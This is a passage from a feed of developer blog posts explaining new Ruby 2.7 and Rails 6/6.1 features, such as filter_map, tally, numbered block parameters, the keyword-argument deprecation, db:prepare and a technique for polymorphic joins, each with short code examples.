variant.</p><p>In Rails 6.1, the configuration to allow variant tracking in the database is bydefault set to true.</p><pre><code class="language-ruby">config.active_storage.track_variants: true</code></pre><p>Check out the <a href="https://github.com/rails/rails/pull/37901">pull request</a> for moredetails on this.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.7 adds Enumerable#filter_map]]></title>
       <author><name>Ashik Salman</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-7-adds-enumerable-filter-map"/>
      <updated>2020-05-08T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-7-adds-enumerable-filter-map</id>
      <content type="html"><![CDATA[<p>Ruby 2.7 adds<a href="https://ruby-doc.org/core-2.7.0/Enumerable.html#method-i-filter_map">Enumerable#filter_map</a>which is a combination of filter + map as the name indicates. The 'filter_map'method filters and map the enumerable elements within a single iteration.</p><p>Before Ruby 2.7, we could have achieved the same with 2 iterations using<code>select</code> &amp; <code>map</code> combination or <code>map</code> &amp; <code>compact</code> combination.</p><pre><code class="language-ruby">irb&gt; numbers = [3, 6, 7, 9, 5, 4]# we can use select &amp; map to find square of odd numbersirb&gt; numbers.select { |x| x.odd? }.map { |x| x**2 }=&gt; [9, 49, 81, 25]# or we can use map &amp; compact to find square of odd numbersirb&gt; numbers.map { |x| x**2 if x.odd? }.compact=&gt; [9, 49, 81, 25]</code></pre><h4>Ruby 2.7</h4><p>Ruby 2.7 adds <code>Enumerable#filter_map</code> which can be used to filter &amp; map theelements in a single iteration and which is more faster when compared to otheroptions described above.</p><pre><code class="language-ruby">irb&gt; numbers = [3, 6, 7, 9, 5, 4]irb&gt; numbers.filter_map { |x| x**2 if x.odd? }=&gt; [9, 49, 81, 25]</code></pre><p>The original discussion had started<a href="https://bugs.ruby-lang.org/issues/5663">8 years back</a>. Here is the latest<a href="https://bugs.ruby-lang.org/issues/15323">thread</a> and<a href="https://github.com/ruby/ruby/pull/2017/commits/38e04e15bf1d4e67c52630fa3fca1d4a056ea768">github commit</a>for reference.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.7 deprecates conversion of keyword arguments]]></title>
       <author><name>Taha Husain</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-7-deprecates-conversion-of-keyword-arguments"/>
      <updated>2020-04-14T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-7-deprecates-conversion-of-keyword-arguments</id>
      <content type="html"><![CDATA[<p>A notable change has been announced for Ruby 3 for which deprecation warning hasbeen added in Ruby 2.7. Ruby 2.7 deprecated automatic conversion of keywordarguments and positional arguments. This conversion will be completely removedin Ruby 3.</p><p><a href="https://github.com/ruby/ruby/blob/4643bf5d55af6f79266dd67b69bb6eb4ff82029a/doc/NEWS-2.7.0#the-spec-of-keyword-arguments-is-changed-towards-30-">Ruby 2.7 NEWS</a>has listed the spec of keyword arguments for Ruby 3.0. We will take the examplesmentioned there and for each scenario we will look into how we can fix them inthe existing codebase.</p><h4>Scenario 1</h4><p><em>When method definition accepts keyword arguments as the last argument.</em></p><pre><code class="language-ruby">def sum(a: 0, b: 0)  a + bend</code></pre><p>Passing exact keyword arguments in a method call is acceptable, but inapplications we usually pass a hash to a method call.</p><pre><code class="language-ruby">sum(a: 2, b: 4) # OKsum({ a: 2, b: 4 }) # Warned</code></pre><p>In this case, we can add a double splat operator to the hash to avoiddeprecation warning.</p><pre><code class="language-ruby">sum(**{ a: 2, b: 4 }) # OK</code></pre><h4>Scenario 2</h4><p><em>When method call passes keyword arguments but does not pass enough requiredpositional arguments.</em></p><p>If the number of positional arguments doesn't match with method definition, thenkeyword arguments passed in method call will be considered as the lastpositional argument to the method.</p><pre><code class="language-ruby">def sum(num, x: 0)  num.values.sum + xend</code></pre><pre><code class="language-ruby">sum(a: 2, b: 4) # Warnedsum(a: 2, b: 4, x: 6) # Warned</code></pre><p>To avoid deprecation warning and for code to be compatible with Ruby 3, weshould pass hash instead of keyword arguments in method call.</p><pre><code class="language-ruby">sum({ a: 2, b: 4 }) # OKsum({ a: 2, b: 4}, x: 6) # OK</code></pre><h4>Scenario 3</h4><p><em>When a method accepts a hash and keyword arguments but method call passes onlyhash or keyword arguments.</em></p><p>If a method arguments are a mix of symbol keys and non-symbol keys, and themethod definition accepts either one of them then Ruby splits the keywordarguments but also raises a warning.</p><pre><code class="language-ruby">def sum(num={}, x: 0)  num.values.sum + xend</code></pre><pre><code class="language-ruby">sum(&quot;x&quot; =&gt; 2, x: 4) # Warnedsum(x: 2, &quot;x&quot; =&gt; 4) # Warned</code></pre><p>To fix this warning, we should pass hash separately as defined in the methoddefinition.</p><pre><code class="language-ruby">sum({ &quot;x&quot; =&gt; 4 }, x: 2) # OK</code></pre><h4>Scenario 4</h4><p><em>When an empty hash with double splat operator is passed to a method thatdoesn't accept keyword arguments.</em></p><p>Passing keyword arguments using double splat operator to a method that doesn'taccept keyword argument will send empty hash similar to earlier version of Rubybut will raise a warning.</p><pre><code class="language-ruby">def sum(num)  num.values.sumend</code></pre><pre><code class="language-ruby">numbers = {}sum(**numbers) # Warned</code></pre><p>To avoid this warning, we should change method call to pass hash instead ofusing double splat operator.</p><pre><code class="language-ruby">numbers = {}sum(numbers) # OK</code></pre><hr><h3>Added support for non-symbol keys</h3><p>In Ruby 2.6.0, support for non-symbol keys in method call was removed. It isadded back in Ruby 2.7. When method accepts arbitrary keyword arguments usingdouble splat operator then non-symbol keys can also be passed.</p><pre><code class="language-ruby">def sum(**num)  num.values.sumend</code></pre><h5>ruby 2.6.5</h5><pre><code class="language-ruby">sum(&quot;x&quot; =&gt; 4, &quot;y&quot; =&gt; 3)=&gt; ArgumentError (wrong number of arguments (given 1, expected 0))sum(x: 4, y: 3)=&gt; 7</code></pre><h5>ruby 2.7.0</h5><pre><code class="language-ruby">sum(&quot;x&quot; =&gt; 4, &quot;y&quot; =&gt; 3)=&gt; 7sum(x: 4, y: 3)=&gt; 7</code></pre><hr><h3>Added support for <code>**nil</code></h3><p>Ruby 2.7 added support for <code>**nil</code> to explicitly mention if a method doesn'taccept any keyword arguments in method call.</p><pre><code class="language-ruby">def sum(a, b, **nil)  a + bendsum(2, 3, x: 4)=&gt; ArgumentError (no keywords accepted)</code></pre><hr><p>To suppress above deprecation warnings we can use<a href="https://github.com/ruby/ruby/blob/4643bf5d55af6f79266dd67b69bb6eb4ff82029a/doc/NEWS-2.7.0#warning-option-"><code>-W:no-deprecated option</code></a>.</p><p>In conclusion, Ruby 2.7 has worked big steps towards changing specification ofkeyword arguments which will be completely changed in Ruby 3.</p><p>For more information on discussion, code changes and official documentation,please head to <a href="https://bugs.ruby-lang.org/issues/14183">Feature #14183</a>discussion, <a href="https://github.com/ruby/ruby/pull/2395">pull request</a> and<a href="https://github.com/ruby/ruby/blob/4643bf5d55af6f79266dd67b69bb6eb4ff82029a/doc/NEWS-2.7.0#the-spec-of-keyword-arguments-is-changed-towards-30-">NEWS release</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.7 adds Enumerator::Lazy#eager]]></title>
       <author><name>Ashik Salman</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-7-adds-enumerator-lazy-eager"/>
      <updated>2020-03-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-7-adds-enumerator-lazy-eager</id>
      <content type="html"><![CDATA[<p>Ruby 2.0 introduced<a href="https://ruby-doc.org/core-2.7.0/Enumerator/Lazy.html"><code>Enumerator::Lazy</code></a>, aspecial type of enumerator which helps us in processing chains of operations ona collection without actually executing it instantly.</p><p>By applying<a href="https://ruby-doc.org/core-2.7.0/Enumerable.html#method-i-lazy"><code>Enumerable#lazy</code></a>method on any enumerable object, we can convert that object into<code>Enumerator::Lazy</code> object. The chains of actions on this lazy enumerator will beevaluated only when it is needed. It helps us in processing operations on largecollections, files and infinite sequences seamlessly.</p><pre><code class="language-ruby"># This line of code will hang and you will have to quit the console by Ctrl+C.irb&gt; list = (1..Float::INFINITY).select { |i| i%3 == 0 }.reject(&amp;:even?)# Just adding `lazy`, the above line of code now executes properly# and returns result without going to infinite loop. Here the chains of# operations are performed as and when it is needed.irb&gt; lazy_list = (1..Float::INFINITY).lazy.select { |i| i%3 == 0 }.reject(&amp;:even?)=&gt; #&lt;Enumerator::Lazy: ...&gt;irb&gt; lazy_list.first(5)=&gt; [3, 9, 15, 21, 27]</code></pre><p>When we chain more operations on <code>Enumerable#lazy</code> object, it again returns lazyobject without executing it. So, when we pass lazy objects to any method whichexpects a normal enumerable object as an argument, we have to force evaluationon lazy object by calling<a href="https://ruby-doc.org/core-2.7.0/Enumerator/Lazy.html#method-i-to_a"><code>to_a</code></a>method or it's alias<a href="https://ruby-doc.org/core-2.7.0/Enumerator/Lazy.html#method-i-force"><code>force</code></a>.</p><pre><code class="language-ruby"># Define a lazy enumerator object.irb&gt; list = (1..30).lazy.select { |i| i%3 == 0 }.reject(&amp;:even?)=&gt; #&lt;Enumerator::Lazy: #&lt;Enumerator::Lazy: ... 1..30&gt;:select&gt;:reject&gt;# The chains of operations will return again a lazy enumerator.irb&gt; result = list.select { |x| x if x &lt;= 15 }=&gt; #&lt;Enumerator::Lazy: #&lt;Enumerator::Lazy: ... 1..30&gt;:select&gt;:reject&gt;:map&gt;# It returns error when we call usual array methods on result.irb&gt; result.sampleirb&gt; NoMethodError (undefined method `sample'irb&gt; for #&lt;Enumerator::Lazy:0x00007faab182a5d8&gt;)irb&gt; result.lengthirb&gt; NoMethodError (undefined method `length'irb&gt; for #&lt;Enumerator::Lazy:0x00007faab182a5d8&gt;)# We can call the normal array methods on lazy object after forcing# its actual execution with methods as mentioned above.irb&gt; result.force.sample=&gt; 9irb&gt; result.to_a.length=&gt; 3</code></pre><p>The<a href="https://ruby-doc.org/core-2.7.0/Enumerator/Lazy.html#method-i-eager"><code>Enumerable#eager</code></a>method returns a normal enumerator from a lazy enumerator, so that lazyenumerator object can be passed to any methods which expects a normal enumerableobject as an argument. Also, we can call other usual array methods on thecollection to get desired results.</p><pre><code class="language-ruby"># By adding eager on lazy object, the chains of operations would return# actual result here. If lazy object is passed to any method, the# processed result will be received as an argument.irb&gt; eager_list = (1..30).lazy.select { |i| i%3 == 0 }.reject(&amp;:even?).eager=&gt; #&lt;Enumerator: #&lt;Enumerator::Lazy: ... 1..30&gt;:select&gt;:reject&gt;:each&gt;irb&gt; result = eager_list.select { |x| x if x &lt;= 15 }irb&gt; result.sample=&gt; 9irb&gt; result.length=&gt; 3</code></pre><p>The same way, we can use <code>eager</code> method when we pass lazy enumerator as anargument to any method which expects a normal enumerator.</p><pre><code class="language-ruby">irb&gt; list = (1..10).lazy.select { |i| i%3 == 0 }.reject(&amp;:even?)irb&gt; def display(enum)irb&gt;   enum.map { |x| p x }irb&gt; endirb&gt;  display(list)=&gt; #&lt;Enumerator::Lazy: #&lt;Enumerator::Lazy: ... 1..30&gt;:select&gt;:reject&gt;:map&gt;irb&gt; eager_list = (1..10).lazy.select { |i| i%3 == 0 }.reject(&amp;:even?).eagerirb&gt; display(eager_list)=&gt; 3=&gt; 9</code></pre><p>Here's the relevant<a href="https://github.com/ruby/ruby/commit/1d4bd229b898671328c2a942b04f08065c640c28">commit</a>and <a href="https://bugs.ruby-lang.org/issues/15901">feature discussion</a> for thischange.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.7 adds numbered parameters as default block parameters]]></title>
       <author><name>Taha Husain</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-7-introduces-numbered-parameters-as-default-block-parameters"/>
      <updated>2020-03-03T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-7-introduces-numbered-parameters-as-default-block-parameters</id>
      <content type="html"><![CDATA[<p>At some point, all of us have used names like <code>a</code>, <code>n</code>, <code>i</code> etc for blockparameters. Below are few examples where numbered parameters can come in handy.</p><pre><code class="language-ruby">&gt; (1..10).each { |n| p n * 3 }&gt; { a: [1, 2, 3], b: [2, 4, 6], c: [3, 6, 9] }.each { |_k, v| p v }&gt; [10, 100, 1000].each_with_index { |n, i| p n, i }</code></pre><p>Ruby 2.7 introduces a new way to access block parameters. Ruby 2.7 onwards, ifblock parameters are obvious and we wish to not use absurd names like <code>n</code> or <code>i</code>etc, we can use numbered parameters which are available inside a block bydefault.</p><p>We can use **1_ for first parameter, **2_ for second parameter and so on.</p><p>Here's how Ruby 2.7 provides numbered parameters inside a block. Below shown arethe examples from above, only this time using numbered parameters.</p><pre><code class="language-ruby">&gt; (1..10).each { p _1 * 3 }&gt; { a: [1, 2, 3], b: [2, 4, 6], c: [3, 6, 9] }.each { p _2 }&gt; [10, 100, 1000].each_with_index { p _1, _2 }</code></pre><p>Like mentioned in<a href="https://github.com/ruby/ruby/blob/7f6bd6bb1c2220d2d7c17b77abf52fb4af548001/doc/NEWS-2.7.0#numbered-parameters">News-2.7.0 docs</a>,Ruby now raises a warning if we try to define local variable in the format <code>_1</code>.Local variable will have precedence over numbered parameter inside the block.</p><pre><code class="language-ruby">&gt; _1 = 0&gt; =&gt; warning: `_1' is reserved for numbered parameter; consider another name&gt; [10].each { p _1 }&gt; =&gt; 0</code></pre><p>Numbered parameters are not accessible inside the block if we define ordinaryparameters. If we try to access <code>_1</code> when ordinary parameters are defined, thenruby raises <code>SyntaxError</code> like shown below.</p><pre><code class="language-ruby">&gt; [&quot;a&quot;, &quot;b&quot;, &quot;c&quot;].each_with_index { |alphabet, index| p _1, _2}=&gt; SyntaxError ((irb):1: ordinary parameter is defined)</code></pre><p>This feature was suggested 9 years back and came back in discussion last year.After many suggestions community agreed to use <code>_1</code> syntax.</p><p>Head to following links to read the discussion behind numbered parameters,<a href="https://bugs.ruby-lang.org/issues/4475">Feature #4475</a> and<a href="https://bugs.ruby-lang.org/issues/15723">Discussion #15723</a>.</p><p>Here's relevant<a href="https://github.com/ruby/ruby/commit/12acc751e3e7fd6f8aec33abf661724ad76c862a">commit</a>for this feature.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 fixes after_commit callback invocation bug]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-fixes-a-bug-where-after_commit-callbacks-are-called-on-failed-update-in-a-transaction-block"/>
      <updated>2020-02-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-fixes-a-bug-where-after_commit-callbacks-are-called-on-failed-update-in-a-transaction-block</id>
      <content type="html"><![CDATA[<p>Rails 6 fixes a <a href="https://github.com/rails/rails/issues/29747">bug</a> where<a href="https://apidock.com/rails/ActiveRecord/Transactions/ClassMethods/after_commit">after_commit</a>callbacks are called on failed update in a transaction block.</p><p>Let's checkout the bug in Rails 5.2 and the fix in Rails 6.</p><h4>Rails 5.2</h4><p>Let's define an<a href="https://apidock.com/rails/ActiveRecord/Transactions/ClassMethods/after_commit">after_commit</a>callback in <code>User</code> model and try updating an invalid user object in atransaction block.</p><pre><code class="language-ruby">&gt;&gt; class User &lt; ApplicationRecord&gt;&gt;   validates :name, :email, presence: true&gt;&gt;&gt;&gt;   after_commit :show_success_message&gt;&gt;&gt;&gt;   private&gt;&gt;&gt;&gt;     def show_success_message&gt;&gt;       p 'User has been successfully saved into the database.'&gt;&gt;     end&gt;&gt; end=&gt; :show_success_message&gt;&gt; user = User.create(name: 'Jon Snow', email: 'jon@bigbinary.com')begin transactionUser Create (0.8ms)  INSERT INTO &quot;users&quot; (&quot;name&quot;, &quot;email&quot;, &quot;created_at&quot;, &quot;updated_at&quot;) VALUES (?, ?, ?, ?)  [[&quot;name&quot;, &quot;Jon Snow&quot;], [&quot;email&quot;, &quot;jon@bigbinary.com&quot;], [&quot;created_at&quot;, &quot;2019-07-14 15:35:33.517694&quot;], [&quot;updated_at&quot;, &quot;2019-07-14 15:35:33.517694&quot;]]commit transaction&quot;User has been successfully saved into the database.&quot;=&gt; #&lt;User id: 1, name: &quot;Jon Snow&quot;, email: &quot;jon@bigbinary.com&quot;, created_at: &quot;2019-07-14 15:35:33&quot;, updated_at: &quot;2019-07-14 15:35:33&quot;&gt;&gt;&gt; User.transaction do&gt;&gt;   user.email = nil&gt;&gt;   p user.valid?&gt;&gt;   user.save&gt;&gt; endbegin transactionfalsecommit transaction&quot;User has been successfully saved into the database.&quot;=&gt; false</code></pre><p>As we can see here, that that the after_commit callback <code>show_success_message</code>was called even if object was never saved in the transaction.</p><h4>Rails 6.0.0.rc1</h4><p>Now, let's try the same thing in Rails 6.</p><pre><code class="language-ruby">&gt;&gt; class User &lt; ApplicationRecord&gt;&gt;   validates :name, :email, presence: true&gt;&gt;&gt;&gt;   after_commit :show_success_message&gt;&gt;&gt;&gt;   private&gt;&gt;&gt;&gt;     def show_success_message&gt;&gt;       p 'User has been successfully saved into the database.'&gt;&gt;     end&gt;&gt; end=&gt; :show_success_message&gt;&gt; user = User.create(name: 'Jon Snow', email: 'jon@bigbinary.com')SELECT sqlite_version(*)begin transactionUser Create (1.0ms)  INSERT INTO &quot;users&quot; (&quot;name&quot;, &quot;email&quot;, &quot;created_at&quot;, &quot;updated_at&quot;) VALUES (?, ?, ?, ?)  [[&quot;name&quot;, &quot;Jon Snow&quot;], [&quot;email&quot;, &quot;jon@bigbinary.com&quot;], [&quot;created_at&quot;, &quot;2019-07-14 15:40:54.022045&quot;], [&quot;updated_at&quot;, &quot;2019-07-14 15:40:54.022045&quot;]]commit transaction&quot;User has been successfully saved into the database.&quot;=&gt; #&lt;User id: 1, name: &quot;Jon Snow&quot;, email: &quot;jon@bigbinary.com&quot;, created_at: &quot;2019-07-14 15:40:54&quot;, updated_at: &quot;2019-07-14 15:40:54&quot;&gt;&gt;&gt; User.transaction do&gt;&gt;   user.email = nil&gt;&gt;   p user.valid?&gt;&gt;   user.save&gt;&gt;   endfalse=&gt; false</code></pre><p>Now, we can see that after_commit callback was never called if the object wasnot saved.</p><p>Here is the relevant <a href="https://github.com/rails/rails/issues/29747">issue</a> andthe <a href="https://github.com/rails/rails/pull/32185">pull request</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.7 adds Enumerable#tally]]></title>
       <author><name>Akhil Gautam</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-7-adds-enumerable-tally"/>
      <updated>2020-02-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-7-adds-enumerable-tally</id>
      <content type="html"><![CDATA[<p>Let's say that we have to find the frequency of each element of an array.</p><p>Before Ruby 2.7, we could have achieved it using <code>group_by</code> or <code>inject</code>.</p><pre><code class="language-ruby">irb&gt; scores = [100, 35, 70, 100, 70, 30, 35, 100, 45, 30]# we can use group_by to group the scoresirb&gt; scores.group_by { |v| v }.map { |k, v| [k, v.size] }.to_h=&gt; {100=&gt;3, 35=&gt;2, 70=&gt;2, 30=&gt;2, 45=&gt;1}# or we can use inject to group the scoresirb&gt; scores.inject(Hash.new(0)) {|hash, score| hash[score] += 1; hash }=&gt; {100=&gt;3, 35=&gt;2, 70=&gt;2, 30=&gt;2, 45=&gt;1}</code></pre><h4>Ruby 2.7</h4><p>Ruby 2.7 adds <code>Enumerable#tally</code> which can be used to find the frequency.<code>Tally</code> makes the code more readable and intuitive. It returns a hash where keysare the unique elements and values are its corresponding frequency.</p><pre><code class="language-ruby">irb&gt; scores = [100, 35, 70, 100, 70, 30, 35, 100, 45, 30]irb&gt; scores.tally=&gt; {100=&gt;3, 35=&gt;2, 70=&gt;2, 30=&gt;2, 45=&gt;1}</code></pre><p>Check out the<a href="https://github.com/ruby/ruby/commit/673dc51c251588be3c9f4b5b5486cd80d46dfeee">github commit</a>for more details on this.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 introduces class_names helper]]></title>
       <author><name>Abhay Nikam</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-introduces-class_names-helper"/>
      <updated>2020-02-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-introduces-class_names-helper</id>
      <content type="html"><![CDATA[<p>Rails 6.1 adds <a href="https://github.com/rails/rails/pull/37918">class_names</a> viewhelper method to conditionally add CSS classes. <code>class_names</code> helper acceptsString, Hash and Array as arguments and returns string of class names built fromarguments.</p><p>Before Rails 6.1, conditional classes were added by using conditionalstatements. Let's take an example of adding an active class to navigation linkbased on the current page.</p><h4>Rails 6.0.0</h4><pre><code class="language-erb">&lt;li class=&quot;&lt;%= current_page?(dashboards_path) ? 'active' : '' %&gt;&quot;&gt;  &lt;%= link_to &quot;Home&quot;, dashboards_path %&gt;&lt;/li&gt;</code></pre><h4>Rails 6.1.0</h4><pre><code class="language-ruby">&gt;&gt; class_names(active: current_page?(dashboards_path))=&gt; &quot;active&quot;# Default classes can be added with conditional classes&gt;&gt; class_names('navbar', { active: current_page?(dashboards_path) })=&gt; &quot;navbar active&quot;# class_names helper rejects empty strings, nil, false arguments.&gt;&gt; class_names(nil, '', false, 'navbar', {active: current_page?(dashboards_path)})=&gt; &quot;navbar active&quot;</code></pre><pre><code class="language-erb">&lt;li class=&quot;&lt;%= class_names(active: current_page?(dashboards_path)) %&gt;&quot;&gt;  &lt;%= link_to &quot;Home&quot;, dashboards_path %&gt;&lt;/li&gt;</code></pre><p>Check out the <a href="https://github.com/rails/rails/pull/37918">pull request</a> for moredetails on this.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails Multiple Polymorphic Joins]]></title>
       <author><name>Priyank Gupta</name></author>
      <link href="https://www.bigbinary.com/blog/rails-multiple-polymorphic-joins"/>
      <updated>2020-01-07T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-multiple-polymorphic-joins</id>
      <content type="html"><![CDATA[<p>Having polymorphic associations in Rails can be a hard nut to crack. It enforces restriction on <code>joins</code> association which makes it difficult to write complex queries.</p><p>Consider following architecture where Defects can be of <code>InspectedTruck</code> or <code>InspectedTrailer</code> associated polymorphically.</p><pre><code class="language-ruby">  class InspectedTruck    has_many :defects, as: :associated_object  end  class InspectedTrailer    has_many :defects, as: :associated_object  end  class Defect    belongs_to :associated_object, polymorphic: true  end</code></pre><p>Finding defects for inspected trucks using <code>joins</code> will raise error.</p><pre><code class="language-ruby">  =&gt; Defect.joins(:associated_object).load  ActiveRecord::EagerLoadPolymorphicError: Cannot eagerly load the polymorphic association :associated_object</code></pre><p>We need to write a raw sql <code>INNER JOIN</code> to fetch trucks with defects.Following query runs perfectly fine.</p><pre><code class="language-ruby">  sql = &quot;INNER JOIN inspected_trucks ON inspected_trucks.id = defects.associated_object_id&quot;  Defect.joins(sql).load</code></pre><p>We faced a scenario in one of our applications with multiple polymorphic joins.We needed to build a single query which lists vehicle inspection time, truck or trailer number and defect name (if available on the inspected item).</p><pre><code class="language-ruby">  class Truck    # attributes :number    has_many :inspected_trucks  end  class Trailer    # attributes :number    has_many :inspected_trailers  end  class VehicleInspectionReport    # attributes :inspection_time    has_one :inspected_truck, class_name: &quot;InspectedTruck&quot;    has_many :inspected_trailers, class_name: &quot;InspectedTrailer&quot;  end  class InspectedTruck    belongs_to :truck    has_many :defects, as: :associated_object  end  class InspectedTrailer    belongs_to :trailer    has_many :defects, as: :associated_object  end  class Defect    # attributes :name    belongs_to :associated_object, polymorphic: true  end</code></pre><p>The task here was to query <code>VehicleInspectionReport</code> joining other five different tables and select required attributes to show. But the challenge here was posed by polymorphic association.</p><p>We had to come up with a way to query <code>InspectedTruck</code> and <code>InspectedTrailer</code> as a single dataset. We identified the dataset a kind of Single Table Inheritance (STI) dataset. And came up with following subquery.</p><pre><code class="language-ruby">  SELECT id AS associated_object_id, 'InspectedTruck' AS associated_object_type, vehicle_inspection_report_id, truck_id, NULL trailer_id  FROM inspected_trucks    UNION  SELECT id AS associated_object_id, 'InspectedTrailer' AS associated_object_type, vehicle_inspection_report_id, NULL truck_id, trailer_id  FROM inspected_trailers</code></pre><p>This subquery gave us all inspected items in a single dataset and we could refer this dataset in a form of STI.</p><p>We were then able to build the final query using above subquery.</p><p>Add a scope in <code>VehicleInspectionReport</code> to join inspected items.</p><pre><code class="language-ruby">  class VehicleInspectionReport    # attributes :inspection_time    INSPECTED_ITEMS_RAW_SQL = &quot;(                              SELECT id, 'InspectedTruck' AS object_type, vehicle_inspection_report_id, truck_id, NULL trailer_id                                FROM inspected_trucks                              UNION                              SELECT id, 'InspectedTrailer' AS object_type, vehicle_inspection_report_id, NULL truck_id, trailer_id                                FROM inspected_trailers                            ) AS inspected_items&quot;    has_one :inspected_truck, class_name: &quot;InspectedTruck&quot;    has_many :inspected_trailers, class_name: &quot;InspectedTrailer&quot;    scope :joins_with_inspected_items, -&gt; { joins(&quot;INNER JOIN #{INSPECTED_ITEMS_RAW_SQL} ON vehicle_inspection_reports.id = inspected_items.vehicle_inspection_report_id&quot;) }  end</code></pre><p><code>joins_with_inspected_items</code> scope on <code>VehicleInspectionReport</code> will work in a way of joining a STI table (<code>inspected_items</code>) on <code>VehicleInspectionReport</code>. We can now chain any query which require inspected items. Example:</p><pre><code class="language-ruby">  VehicleInspectionReport.select(&quot;defects.id AS defect_id,                                  defects.name AS description,                                  trucks.truck_number AS truck_number,                                  trailers.number AS trailer_number,                                  vehicle_inspection_reports.inspection_time AS inspection_time&quot;)        .joins_with_inspected_items        .joins(&quot;LEFT JOIN defects ON inspected_items.id = defects.associated_object_id                  AND defects.associated_object_type = inspected_items.object_type&quot;)        .joins(&quot;LEFT JOIN trucks ON inspected_items.truck_id = trucks.id&quot;)        .joins(&quot;LEFT JOIN trailers ON inspected_items.trailer_id = trailers.id&quot;)        .where(&quot;inspected_items.id IS NOT NULL&quot;)        .order('truck_number, trailer_number, inspection_time DESC')</code></pre><p>The underlying concept here is to structure STI dataset from polymorphic architecture. Notice the use of <code>inspected_items</code> dataset in a form of STI using <code>inspected_items.associated_object_id</code> AND <code>inspected_items.associated_object_type</code>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds rails db:prepare to migrate or setup a database]]></title>
       <author><name>Akhil Gautam</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-rails-db-prepare-to-migrate-or-setup-a-database"/>
      <updated>2019-12-10T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-rails-db-prepare-to-migrate-or-setup-a-database</id>
      <content type="html"><![CDATA[<p>Rails 6 adds rails db:prepare to migrate or setup a database if it doesn'texist.</p><p>Before Rails 6, we had to run the following tasks to set up the database.</p><pre><code class="language-ruby"># create the databaserails db:create# run the migrationsrails db:migrate# prepopulate the database with initial/default datarails db:seed</code></pre><h4>Rails 6</h4><p>Rails 6, adds<a href="https://github.com/rails/rails/blob/98754de1412870d7dae9eba1c7bac944b9b90093/activerecord/lib/active_record/railties/databases.rake#L298">rails db:prepare</a>to get rid of running all the above tasks individually. <code>rails db:prepare</code> firstcalls the<a href="https://github.com/rails/rails/blob/98754de1412870d7dae9eba1c7bac944b9b90093/activerecord/lib/active_record/railties/databases.rake#L306"><code>migrate</code></a>to run the migrations, but if the database doesn't exist, <code>migrate</code> throws an<code>ActiveRecord::NoDatabaseError</code>. Once it is<a href="https://github.com/rails/rails/blob/98754de1412870d7dae9eba1c7bac944b9b90093/activerecord/lib/active_record/railties/databases.rake#L311">catched</a>,it performs the following operations:</p><ul><li>Creates the database.</li><li>Loads the schema.</li><li>Seeds the database.</li></ul><p>Thus, <code>rails db:prepare</code> saves a lot of time spent on running database tasksindividually while setting up an application and finishes it with just onecommand.</p><p>Here is the relevant <a href="https://github.com/rails/rails/pull/35768">pull request</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 adds *_previously_was attribute methods]]></title>
       <author><name>Abhay Nikam</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-adds-_previously_was-attribute-methods"/>
      <updated>2019-12-03T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-adds-_previously_was-attribute-methods</id>
      <content type="html"><![CDATA[<p>Rails 6.1 adds <a href="https://github.com/rails/rails/pull/36836">*_previously_was</a>attribute methods for dirty tracking the previous attribute value after themodel is saved or reset. <code>*_previously_was</code> returns the previous attribute valuethat was changed before the model was saved</p><p>Before Rails 6.1, to retrieve the previous attribute value, we used<code>*_previous_change</code> or<a href="https://apidock.com/rails/ActiveModel/Dirty/previous_changes">previous_changes</a>.</p><p>Here is how it can be used.</p><h4>Rails 6.0.0</h4><pre><code class="language-ruby">&gt;&gt; user = User.new=&gt; #&lt;User id: nil, name: nil, email: nil, created_at: nil, updated_at: nil&gt;&gt;&gt; user.name = &quot;Sam&quot;# *_was returns the original value. In this example, the name was initially nil.&gt;&gt; user.name_was=&gt; nil&gt;&gt; user.save!# After save, the original value is set to &quot;Sam&quot;. To retrieve the# previous value, we had to use `previous_changes`.&gt;&gt; user.previous_changes[:name]=&gt; [nil, &quot;Sam&quot;]</code></pre><h4>Rails 6.1.0</h4><pre><code class="language-ruby">&gt;&gt; user = User.find_by(name: &quot;Sam&quot;)=&gt; #&lt;User id: 1, name: &quot;Sam&quot;, email: nil, created_at: &quot;2019-10-14 17:53:06&quot;, updated_at: &quot;2019-10-14 17:53:06&quot;&gt;&gt;&gt; user.name = &quot;Nick&quot;&gt;&gt; user.name_was=&gt; &quot;Sam&quot;&gt;&gt; user.save!&gt;&gt; user.previous_changes[:name]=&gt; [&quot;Sam&quot;, &quot;Nick&quot;]# *_previously_was returns the previous value.&gt;&gt; user.name_previously_was=&gt; &quot;Sam&quot;# After reload, all the dirty tracking# attributes is reset.&gt;&gt; user.reload&gt;&gt; user.name_previously_was=&gt; nil</code></pre><p>Check out the <a href="https://github.com/rails/rails/pull/36836">pull request</a> for moredetails on this.</p>]]></content>
    </entry><entry>
